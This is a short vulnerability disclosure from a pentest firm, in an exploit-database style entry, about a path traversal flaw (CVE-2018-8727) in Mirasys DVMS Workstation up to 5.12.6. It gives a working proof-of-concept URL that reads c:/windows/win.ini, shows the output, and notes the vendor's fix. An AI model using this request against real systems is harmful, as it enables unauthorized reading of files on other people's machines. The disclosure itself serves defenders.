During a recent pentest for one of our clients, we discovered a Camera webapplication running on port 9999, exposed to the internet. All applications which are accessible over the internet by anonymous users are interesting targets to possibly gain access to internal networks or linked systems.

The webapplication identified as a somewhat older version of Mirasys Workstation, an application that allows authorized users to logon and view and configure camera’s. After some initial investigation, we found a simple flaw in the webserver which allows an anonymous users to read files on the system.

When visiting the application using the following URL, the contents of c:/windows/win.ini can be read:

http://localhost:9999/.../.../.../.../.../.../.../.../.../windows/win.ini
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

The vendor was informed and the vulnerability is fixed by updating the software to the most recent version (greater than 5.12.6).

# Exploit Title: Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6
# Date: 10-06-2018
# Exploit Author: Onvio, Dick Snel, https://www.onvio.nl
# Vendor Homepage: https://www.mirasys.com/
# Software Link: https://www.onvio.nl/binaries/mirasys_5_12_6.zip
# Version: <= 5.12.6
# Tested on: Windows 10 Pro x64
# CVE : CVE-2018-8727